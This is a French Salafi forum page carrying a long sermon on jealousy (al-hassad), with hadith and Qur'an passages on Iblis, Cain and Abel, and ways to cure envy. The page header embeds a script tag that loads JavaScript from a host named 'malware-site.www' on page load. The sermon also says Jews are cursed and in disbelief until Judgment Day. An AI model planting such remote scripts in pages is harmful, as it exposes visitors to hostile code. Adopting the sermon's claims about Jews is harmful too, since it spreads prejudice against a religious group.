ISLAM SUIVANT LE CORAN ET LA SUNNA

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<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

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Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

la jalousie el-hassed Artfic11

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
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    la jalousie el-hassed

    assalafia
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    Emploi/loisirs : lire le coran
    Humeur : bonne

    la jalousie el-hassed Empty la jalousie el-hassed

    Message par assalafia Lun 11 Fév - 13:37

    la jalousie el-hassed 364988687
    [color:80bf=#000]

    la jalousie el-hassed ImageProxy.mvc?bicild=&canary=i2g6qCgvo5WSkNJNL2EYKteBDe14gfIFFRHLvenWE1c%3d0&url=http%3a%2f%2fidata.over-blog.com%2f2%2f22%2f33%2f01%2fislam-3%2fcxcqsd

    Premier sermon

    Certes
    la louange est à Allah, Détenteur de la grâce immense, Il réserve à qui
    Il veut Sa grâce et c'est Lui le Tout Puissant, le Sage ; et j’atteste
    qu’il n’y a de divinité si ce n’est Allah, Seul sans associé dans Sa
    Seigneurie, dans Son adoration et dans Ses plus beaux Noms - Toute
    gloire à Allah à qui appartient le Trône Immense ; et j’atteste que
    Muhammad est Son serviteur et messager, celui qui est d'une grande
    moralité et celui qui aura le haut rang ; Que la paix et la bénédiction
    d'Allah soient sur lui par une profusion de salutations, ainsi que sur
    sa famille et ses compagnons, ceux à qui on accorde tout le mérite et le
    respect.

    Ceci dit :

    Ô gens !

    Voici
    un comportement blâmable, un comportement blâmable vis-à-vis duquel le
    Messager (Que la paix et la bénédiction d'Allah soient sur lui) a mis en
    garde sa communauté, et le leur a interdit à savoir : La jalousie
    [Al-Hassad] ; Il (Que la paix et la bénédiction d'Allah soient sur lui) a
    dit :


    « Une maladie des nations antérieures s’est propagée parmi vous : la jalousie et la haine… » [1] [Hadith hassan. Voir le Djami’ d’At-Tirmidhi, 2434].

    Il (Que la paix et la bénédiction d'Allah soient sur lui) a dit :

    «
    Ne vous jalousez pas, ne vous haïssez pas, n’enchérissez pas les uns
    sur les autres, n’agissez pas avec perversité les uns à l’égard des
    autres, ne concluez pas d’achats au détriment les uns des autres, soyez,
    ô serviteurs d’Allah!, tous frères, le musulman est frère du musulman,
    il ne l'opprime pas, ne l’abandonne pas, il ne lui ment pas, ne le
    méprise pas.

    La
    crainte d'Allah se trouve ici, il montra trois fois sa poitrine puis
    ajouta : Le pire de l’iniquité est que le musulman méprise son frère
    musulman.

    Tout ce qui appartient au musulman est interdit au musulman : son sang, son bien et son honneur. »
    [Rapporté par Mouslim].

    Craignez Allah, Ô serviteurs d’Allah !

    La
    jalousie [Al-Hassad] est la plus grande maladie qui a fait son
    apparition dans cette communauté, compte tenu des conséquences néfastes
    qui en découlent.


    La
    jalousie signifie : souhaiter voir disparaitre le bienfait dont jouit
    l’envié ; si [l’envieux] observe chez son frère un bienfait qu’Allah lui
    a accordé, alors il souhaitera voir disparaitre de lui [ce bienfait].


    Ceci sans raison aucune, si ce n’est parce qu’il le déteste ; ainsi si il le déteste alors, il va se mettre à le jalouser.

    Et [il va de soi], que la jalousie est une vieille maladie.

    Le
    premier à avoir fait preuve de jalousie, c’est Ibliss - qu'Allah le
    maudisse, il a jalousé notre père Adam – que la paix soit sur lui – pour
    touts les bienfaits qu’Allah lui a accordés ; ainsi Allah l’a créé de
    Ses mains, Il lui enseigna tous les noms (de toutes choses) et Il
    demanda à Ses Anges de se prosterner devant lui, il le fit habiter le
    Paradis ; c’est à ce moment-là qu’Ibliss s’indigna et refusa de se
    prosterner avec les anges (traduction rapprochée) : « Alors, les Anges se prosternèrent tous ensemble », lorsque leur Seigneur leur demanda de se prosterner devant Adam, ils se prosternèrent (traductions rapprochées) : « excepté Ibliss qui refusa d'être avec les prosternés » - « il refusa, s'enfla d'orgueil et fut parmi les infidèles. ».


    Ceci
    parce qu’il fit preuve de jalousie envers Adam – que la paix soit sur
    lui – pour touts les bienfaits qu’Allah lui avait accordés ; il refusa
    de se prosterner devant lui s'enflant d'orgueil, prétextant qu’il est
    plus émérite qu’Adam selon sa prétention, parce qu’Allah le créa de feu
    et Adam d'argile.


    Et
    selon sa prétention, le feu est supérieur à l’argile, mais il ne fait
    aucun doute que cette allégation est fausse, car l’argile est bien mieux
    que le feu parce qu’avec l’argile les plantes gracieuses poussent et
    donnent des fruits et [sans compter] que l’argile offre de nombreux
    avantages à l’inverse du feu qui est brûlant.


    Le feu ne produit rien si ce n’est consumer et abîmer la chose ; de ce fait il fut fort déçu et ses efforts furent vain.

    Et
    lorsqu’il se montra hautin envers Adam et qu’il fit preuve de jalousie
    envers lui, Allah – Le Très Haut – le chassa et le maudit.


    [Pourtant],
    Il était dans un premier temps dans le ciel parmi les anges à adorer
    Allah, puis lorsqu’il fit preuve de jalousie envers Adam, Allah le
    chassa et le maudit et le fit descendre du ciel à la terre.


    Et
    Il en fit un maître pour toute personne malveillante, un prêcheur vers
    la mal et Il en fit un des habitants du Feu qui appelle sans cesse et
    toujours au Feu, tout ceci à cause de la jalousie.


    S’il
    n’avait pas fait preuve de jalousie envers Adam et qu’il s’était
    prosterné avec les anges qui ne l’avaient pas jalousé – que la paix soit
    sur lui – il aurait conservé sa dignité et son rang ; mais dés lors
    qu’il fit preuve de jalousie envers Adam et qu’il objecta, Allah le
    chassa et le maudit et l’éloigna – On demande la protection d’Allah –
    tout cela résulte des conséquences de la jalousie.


    Également, Allah – Exalté soit-Il – dit (traduction rapprochée) :

    « Et raconte-leur en toute vérité l'histoire des deux fils d'Adam » Qabil (Cain) et Habil (Abel) les deux fils d'Adam (traduction rapprochée) : « Les deux offrirent des sacrifices; celui de l'un fut accepté et celui de l'autre ne le fut pas »
    ; ainsi, celui dont Allah accepta [l’offrande] faisait partie des
    pieux, alors que l’autre n’en faisait pas partie ; et Allah – Exalté
    soit-Il – dit (traduction rapprochée) : « Allah n'accepte, dit l'autre, que de la part des pieux ».


    Il a fait preuve de jalousie envers son frère et dit (traduction rapprochée) : « Je te tuerai sûrement », il jura ainsi à son frère qu'il le tuerait alors son frère lui répondit (traduction rapprochée) : « Si tu étends vers moi ta main pour me tuer, moi, je n'étendrai pas vers toi ma main pour te tuer: car je crains Allah… » : Il craint Allah – Exalté soit-Il – et il a peur de tuer son frère.

    Mais ce criminel, cet envieux ne pu s'empêcher de passer à l’acte en tuant son frère (traduction rapprochée) : « Son âme l'incita à tuer son frère. Il le tua donc et devint ainsi du nombre des perdants. ».

    Premièrement : il rompu les liens de sang
    et
    secundo : Il fit preuve de jalousie envers son frère pour la
    particularité qu’Allah a donné à son frère lorsqu’Il accepta ses
    sacrifices (traduction rapprochée) : « Il le tua donc et devint ainsi du nombre des perdants. »


    Une
    perte qui ne peut être récupérée et un dommage impossible à
    reconsolider [une nouvelle fois] ; tout cela à cause de la jalousie –
    nous cherchons refuge auprès d'Allah.


    Les
    juifs, lorsqu’Allah envoya Son Prophète Muhammad (paix et bénédictions
    d’Allah sur lui), le sceaux des prophètes et le meilleur des prophètes
    et des envoyés et qu’ils ont vu qu’il était de la descendance d’Ismaël,
    ils l’ont jalousé parce qu’ils voulaient que la prophétie se réalise
    parmi les enfants d’Israël.


    Ils
    s’opposent à Allah – à Lui la Louange, Le Très Haut - et ils veulent
    empêcher la grâce d’Allah alors qu’Il la donne à qui Il veut.


    Ainsi,
    ils se sont mis à jalouser Muhammad (paix et bénédictions d’Allah sur
    lui) et ils ont mécru en lui quand bien même ils savaient qu'il était
    l’Envoyé d’Allah et (traduction rapprochée) : « ils (les gens du livre) reconnaissent (le Messager Muhammad) comme ils reconnaissent leurs propres enfants. » -
    compte tenu de ses descriptions (celles de Muhammad - paix et
    bénédictions d’Allah sur lui) qu’ils ont dans la Thora et L’Evangile.


    Ils
    le connaissent bien et ils ne l’ont pas pris pour ennemi ou désavoué
    son message par pure ignorance, mais par pure jalousie, donc cela qui
    les a conduits à la mécréance.


    Observez-donc
    ce que la jalousie peut déclencher : tuer des âmes innocentes et
    conduire à la mécréance et ceci est plus grave – nous cherchons refuge
    auprès d'Allah.


    Cela conduit à la malédiction d’Allah comme cela est arrivé à Ibliss.

    Soyez méfiants, O serviteurs d’Allah !

    Méfiez-vous
    de la jalousie car le Messager (paix et bénédictions d’Allah sur lui)
    nous a mis en garde contre celle-ci en disant : « Ne vous jalousez pas ! »,
    ceci est une interdiction venant du Messager (paix et bénédictions
    d’Allah sur lui) nous interdisant de nous jalouser mutuellement.


    Quant
    à celui qui observe un quelconque bienfait chez son frère, il ne doit
    pas le jalouser pour cela mais il doit demander à Allah de Sa grâce,
    Allah – Exalté soit-Il – dit (traduction rapprochée) :


    «
    Ne convoitez pas ce qu'Allah a attribué aux uns d'entre vous plus
    qu'aux autres; aux hommes la part qu'ils ont acquise, et aux femmes la
    part qu'elles ont acquise. Demandez à Allah de Sa grâce… ».


    Demande à Celui qui à donné ce bienfait à ton frère, qu’Il te donne de Sa grâce car Allah est le Bienfaisant et le Généreux.

    Si
    tu le Lui demandes, Il te donnera ; mais si tu fais preuve de jalousie
    envers ton frère pour un bienfait d’Allah, qu’Allah lui a fait grâce,
    alors tu seras dés lors en opposition avec la décision d’Allah ; et de
    ceux qui ont rompu le lien du sang et le lien de Foi qu’il y a entre toi
    et ton frère.


    Soigne
    ta jalousie en faisant ta demande auprès d’Allah – L’infiniment
    Généreux - de Sa grâce - Car (la grâce d') Allah est immense et Il est
    Omniscient.


    Et
    soigne ta jalousie, également, avec le fait que tu dois croire au
    destin et à la prédestination [Ndt : il s’agit de mettre cette croyance
    en le destin et à la prédestination en pratique] et que tout ce qui est
    parvenu à ton frère [comme bienfait], correspond à la décision d’Allah
    et de ce qu’il a prédestiné et Allah – à Lui la Louange, Le Très Haut,
    sait mieux.


    Ne vas pas à l’encontre de la décision d’Allah – à Lui la Louange, Le Très Haut.

    Ne
    t’oppose pas à Allah dans Sa décision et dans ce qu’il a prédestiné et
    ne dis pas qu’untel ne mérite pas une telle chose, comme nous l'avons
    entendu de certaines personnes : « Par Allah ! Untel ne mérite pas cette chose » ; « pourquoi untel…? ».


    Ou lorsqu’un malheur touche une personne, on entend dire qu’untel dit : « c’est quelqu’un de bon et il ne mérite pas ce qui lui arrive », comme s’il s’opposait à la décision d’Allah – à Lui la Louange, Le Très Haut.

    Le musulman se doit d’être satisfait de la décision d’Allah et de ce qu’il a prédestiné.

    Egalement,
    parmi les choses qui permettent de soigner la jalousie, le fait que tu
    invoques pour ton frère en demandant pour lui la bénédiction [d’Allah],
    tu invoques en demandant pour lui la Baraka ; au lieu de souhaiter voir
    disparaître un bienfait, tu invoques pour lui afin que bienfait dure et
    pour qu’Allah lui donne la bénédiction dans ce bienfait : ceci ne peut
    en aucun cas te nuire, au contraire, ceci te sera bénéfique auprès
    d’Allah.


    Soigne ainsi ta jalousie avec ce genre de choses.

    Encore,
    parmi les choses qui permettent de soigner la jalousie, le fait que tu
    demandes ta subsistance et tu uses des causes pour cela.


    Mais
    que tu restes assis et que tu complaises dans la paresse et la
    fainéantise et que tu te mettes à jalouser les autres personnes qui
    gagnent leur subsistance et qui la demande – que tu te mettes à les
    jalouser pour ce qu’Allah leur a donné – dans ce cas la réprimande doit
    être dirigée vers toi seul, car c’est toi qui a été défaillant, c’est
    toi qui a délaissé les causes et c’est toi qui a choisi la paresse ; tu
    devrais te faire des reproches qu’à toi-même au lieu d’envier les gens
    pour ce qu'Allah leur a donné de par Sa grâce.


    Par conséquent, O serviteurs d’Allah !

    La
    jalousie conduit à la mécréance comme cela est arrivé à Ibliss, elle
    conduit au meurtre comme elle conduit Qabil (Cain) à tuer son frère
    Habil (Abel).


    Et
    en nous révélant cette histoire, Allah nous invite très certainement, à
    en tirer les enseignements, d'en prendre garde et de nous méfier de la
    jalousie.


    De
    même que la jalousie conduit la personne à s’opposer à Allah – à Lui la
    Louange, Le Très Haut - dans Sa décision et dans ce qu’il a prédestiné ;
    de prétendre qu’Allah n’est pas sage et qu’Il n’est pas parfaitement
    connaisseur et qu’Il n’est pas Omniscient, tout comme Il donne à celui
    qu’il ne mérite pas qu’on le lui donne ou qu’Il inflige une punition à
    celui qui ne mérite pas la punition : ceci est de la mécréance relative
    au destin et à la prédestination - et certes, il n'est de force ni de
    puissance qu'en Allah.


    Par conséquent, la jalousie est une maladie calamiteuse : demandez la protection d’Allah contre la jalousie.

    Ainsi, la jalousie est comme elle est décrite dans le Hadith rapporté par Ahmad et At-Tirmidhi :

    « La jalousie dévore les bonnes actions, comme le feu consume le bois. »

    Soyez méfiants !

    Méfiez-vous, O serviteurs d’Allah !

    Soyez
    sur vos gardes pour que vos bonnes actions ainsi que vos bonnes œuvres
    ne soient dévorées à cause de la jalousie ; demandez la protection
    d’Allah contre la jalousie et demandez à Allah de Sa grâce et aimer pour
    vos frères tout le bien et invoquez [Allah] en leur faveur en demandant
    pour eux la Baraka – et Allah – à Lui la Louange, Le Très Haut – a la
    grâce immense; Il est Omniscient ; Il détient la grâce immense
    (traduction rapprochée) : « qu'Il donne à qui Il veut », n’allez pas à l’encontre de la décision d’Allah – à Lui la Louange, Le Très Haut - sinon (traduction rapprochée) : « vos œuvres deviendraient vaines sans que vous vous en rendiez compte. », méfiez-vous donc de la jalousie.


    Ce qui est une obligation pour le musulman, c’est de vouloir le bien pour son frère comme il le souhaite pour lui-même.

    Non
    pas de pas détester le bien qui se trouve entre les mains de son frère,
    au contraire, il doit lui vouloir ce bien ; le Messager (paix et
    bénédictions d’Allah sur lui) a dit :


    « Aucun d’entre vous n’est [vraiment] croyant jusqu’à ce qu’il aime pour son frère ce qu’il aime pour lui-même. »
    [Rapporté par Al-Boukhari dans le chapitre de la foi (n°13), et par Mouslim dans le chapitre de la foi (n°45)].

    Considère
    ton frère étant toi-même, de la même façon que tu aimes le bien pour
    toi-même, aime le pour ton frère et ne le déteste pas lorsqu’il s’agit
    de ton frère.


    De
    la même façon que tu as de détester le mal pour toi-même, tu le
    détestes pour ton frère parce que toi et lui, vous êtes tel un seul
    corps.


    Tous les croyants ne forment qu’un seul corps.

    Comment peux-tu, de ce fait, envier ton frère pour un bienfait qu’Allah lui a accordé ?

    Aussi,
    parmi les préjudices provenant de la jalousie, le fait que l’envieux
    soit constamment dans un état de pénitence et de rage, il mène une
    existence calamiteuse du fait de voir qu’une quantité de bienfaits sont
    accordés aux serviteurs d’Allah et que lui ne fait que les jalouser ;
    son cœur brule sans arrêt à leur sujet et envers Allah – à Lui la
    Louange, Le Très Haut.


    Et
    somme toute, il mène une vie pitoyable du fait de voir les bienfaits
    parvenir aux serviteurs d’Allah ; mais qui donc pourrait empêcher la
    grâce d'Allah – à Lui la Louange – [de s’accomplir] ? (traduction rapprochée) :


    «
    Ce qu'Allah accorde en miséricorde, il n'est personne à pouvoir le
    retenir. Et ce qu'Il retient, il n'est personne à le relâcher après Lui.
    Et c'est Lui le Puissant, le Sage. ».


    Personne
    ne peut empêcher le destin d’Allah et ce qu’Il à prédestiné de
    s’accomplir, personne ne peut empêcher l’attribution des dons [d’Allah],
    personne ne peut empêcher les catastrophes ; ceci est dans la main
    d'Allah – à Lui la Louange, Le Très Haut.


    L’envieux
    mène une existence dans laquelle il est en souci permanent parce que
    les bienfaits d’Allah parviennent les uns après les autres à Ses
    serviteurs, alors qu’il aimerait que rien ne leur parvienne.


    Il
    ne veut pas que les gens reçoivent leur subsistance, il ne veut pas que
    les gens s’instruisent, il ne veut pas que les gens bénéficient d’une
    quelconque grâce provenant d’Allah ; il veut tout pour lui, et rien pour
    les autres.


    C’est donc [pour cette raison], qu’il se rend malade et s’irrite et demeure dans une profonde tristesse à cause de la jalousie.

    La jalousie est comparable à un feu qui brule dans son cœur,

    «
    délaisse l’envieux, car c’est en faisant cela que tu parviendras à
    l’écarter – ne vois-tu pas que le feu se consume lui-même, s’il ne
    trouve rien d’autre à dévorer »
    .


    Au
    final, l’envieux ne cause du tord qu’à lui-même : demandez-donc la
    protection d’Allah contre la jalousie et purifiez vos sentiments de la
    jalousie et souhaitez pour vos frères la grâce et les bienfaits, après
    avoir souhaité cela pour vous-même ; car ceci est le signe de la Foi
    [Al-Iman], le croyant aime pour son frère ce qu’il aime pour lui-même,
    voilà le vrai croyant :


    « Aucun d’entre vous n’est [vraiment] croyant jusqu’à ce qu’il aime pour son frère ce qu’il aime pour lui-même ».

    Quant
    aux juifs, qu’est-ce qui les a écartés de la Foi et qui les a propulsés
    dans la mécréance et prédestiné au Feu et exposés la colère d'Allah, se
    ce n’est la jalousie (traduction rapprochée) :

    « Nombre de gens du Livre aimeraient pouvoir vous rendre mécréants après que vous ayez cru. », quelle en est la raison ? (traduction rapprochée) : « …par jalousie de leur part, après que la vérité s'est manifestée à eux! ».
    Ce qui les a poussés à faire cela, c’est la jalousie – nous cherchons refuge auprès d'Allah.


    De
    ce fait, ils ont subi la colère d’Allah et Sa malédiction est tombée
    sur eux et les voilà dans la mécréance jusqu'au Jour de la Résurrection ;
    nous demandons à Allah de nous en préserver.


    À l’exception de celui d’entre eux qui s’est repenti et est revenu à Allah – à Lui la Louange, Le Très Haut.

    Craignez Allah, O serviteurs d’Allah ! – demandez-donc la protection d’Allah contre la jalousie !

    Purifiez
    vos sentiments de la jalousie et invoquez beaucoup Allah pour tous les
    bienfaits que vous pouvez observer et demandez à Allah d’augmenter
    davantage le bien pour vos frères ; demandez pour vous la même chose que
    ce qu’Allah a octroyé à vos frères.


    Quant
    à celui qui observe un bienfait chez son frère, puis demande à Allah et
    formule le désir auprès d’Allah afin qu’Il lui accorde la même chose,
    dans ce cas alors il ne peut être considéré commet étant un envieux ;
    ceci est un désir ; Et le Prophète (paix et bénédictions d’Allah sur
    lui) a dit :


    « L'envie n'est permise que dans deux cas… » [2]
    - c’est-à-dire qu’il n’y a de désir (permis) que dans deux situations :

    «
    Un homme à qui Allah a donné la science qu’il enseigne aux gens et
    qu’il propage et un homme à qui Allah a accordé une grande fortune qu’il
    dépense dans le Sentier d’Allah. »
    .


    Ce
    dernier souhaite ce que veut son frère, qu’Allah lui donne la science
    qu’il mettra en pratique, qu’Allah lui accorde une grande fortune qu’il
    dépense dans ce qui est juste – son intention est noble ; il a dit (paix
    et bénédictions d’Allah sur lui) : « ils sont égaux dans la récompense », l’un par son œuvre et l’autre par son intention.


    Rappelez-vous ceci, O serviteurs d’Allah ! (traduction rapprochée) :

    « Demandez à Allah de Sa grâce. Car Allah, certes, est Omniscient. » [S04. V32]

    (je recherche la protection d'Allah contre Satan le banni) (traduction rapprochée) :

    «
    Ne convoitez pas ce qu'Allah a attribué aux uns d'entre vous plus
    qu'aux autres; aux hommes la part qu'ils ont acquise, et aux femmes la
    part qu'elles ont acquise. Demandez à Allah de Sa grâce. Car Allah,
    certes, est Omniscient. »
    [S04. V32]


    Qu'Allah
    me bénisse ainsi que vous même par le Qur'an (le Coran sublime) et
    qu'Il nous fasse profiter par ce qu'il renferme comme signes et sages
    rappel.


    Je
    dis cette parole et je demande pardon à Allah pour tous les péchés pour
    vous et moi et pour le restant des musulmans, alors demandez lui pardon
    et revenez à lui repentant, il est certes le Pardonneur et le
    Miséricordieux.

      La date/heure actuelle est Lun 3 Juin - 0:42